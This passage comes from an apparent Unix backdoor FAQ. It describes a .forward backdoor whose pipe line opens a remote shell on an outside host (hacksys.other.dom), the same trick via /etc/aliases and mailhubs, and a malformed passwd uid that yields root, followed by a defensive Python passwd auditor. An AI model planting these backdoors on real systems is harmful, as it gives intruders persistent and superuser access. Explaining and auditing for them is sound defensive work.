Be aware that no defense is foolproof, and that there is no substitute for diligent attention.


-------------------------------------------------------------------------


you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account ``username'' a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

Permutations of this method include alteration of the system's mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation; the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing).

PS: The above method is also useful for gaining access to a company's mailhub (assuming there is a shared home directory FS on the client and server).


> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).


---------------------------------------------------------------------------


you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/passwd file, most login(1) implementations will fail to detect the wrong uid/gid, and atoi(3) will set the uid/gid to 0, giving superuser privileges.

example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.
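The failure described here is a lenient parser: atoi(3) returns 0 for input it cannot parse, and 0 is root. The defensive counterpart is to validate the file with a strict parser that refuses anything that is not purely numeric, and to report every uid 0 entry that is not root. The block below is an added example (not from the posting); SAMPLE_PASSWD is constructed and includes the posting's rmartin line, and lenient_atoi() is a small imitation of atoi(3) used only to show what value the lenient path would have produced.

```python
"""Strict /etc/passwd validation versus atoi()-style leniency.

Added example, not from the posting. SAMPLE_PASSWD is constructed.
"""
import re

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
backup:x:0:34:backup:/var/backups:/bin/sh
alice:x:1001:1001:Alice:/home/alice:/bin/bash
bob:x:1002:1002 :Bob:/home/bob:/bin/bash
"""

STRICT_ID = re.compile(r"^[0-9]+$")


def lenient_atoi(s):
    """Imitate atoi(3): skip leading whitespace, take an optional sign and the
    leading digits, and return 0 when there are none."""
    m = re.match(r"^\s*([+-]?[0-9]+)", s)
    return int(m.group(1)) if m else 0


def audit_passwd(text):
    """Return (line number, account, problem) for malformed or suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "wrong field count"))
            continue
        name, _pw, uid, gid, _gecos, _home, _shell = fields
        for label, value in (("uid", uid), ("gid", gid)):
            if not STRICT_ID.match(value):
                findings.append((lineno, name,
                                 f"non-numeric {label} {value!r}; atoi() would yield {lenient_atoi(value)}"))
        if STRICT_ID.match(uid) and int(uid) == 0 and name != "root":
            findings.append((lineno, name, "uid 0 account other than root"))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(*finding)
```

The rmartin line is reported with "atoi() would yield 0", which is the posting's point; the bob line shows the other direction, a field that a lenient parser reads as 1002 but a strict one rejects. A passwd file with any such entry should be fixed rather than tolerated, and pwck(8) performs a similar consistency check on most systems.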